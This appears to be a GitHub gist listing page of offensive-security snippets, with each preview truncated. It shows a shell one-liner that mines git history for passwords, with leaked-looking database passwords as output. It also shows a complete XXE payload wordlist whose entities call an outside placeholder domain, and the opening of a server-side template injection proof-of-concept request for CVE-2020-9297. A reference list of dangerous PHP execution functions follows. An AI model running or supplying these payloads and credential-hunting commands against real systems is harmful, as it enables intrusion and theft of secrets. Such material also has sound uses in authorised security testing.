Skip to content

Instantly share code, notes, and snippets.

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
@bsysop
bsysop / xxe-payloads.txt
Created September 14, 2020 16:15 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
window.onbeforeunload = function() {
return "You are going out, have you finished your report?";
};
#!/usr/bin/env python
"""
Simple HTTP URL redirector
Shreyas Cholia 10/01/2015
usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url
HTTP redirect server
positional arguments:
@bsysop
bsysop / CVE-2020-9297_poc.txt
Created May 11, 2020 15:09
GHSL-2020-028 AKA CVE-2020-9297 Netflix titus SSTI PoC by Jang
POST /api/v3/jobs HTTP/1.1
Host: host:7001
User-Agent: Mozilla/5.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-type: application/json
Content-Length: 735
{
"applicationName": "localtest",
@bsysop
bsysop / phpdangerousfuncs.md
Created January 20, 2020 01:03 — forked from mccabe615/phpdangerousfuncs.md
Dangerous PHP Functions

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program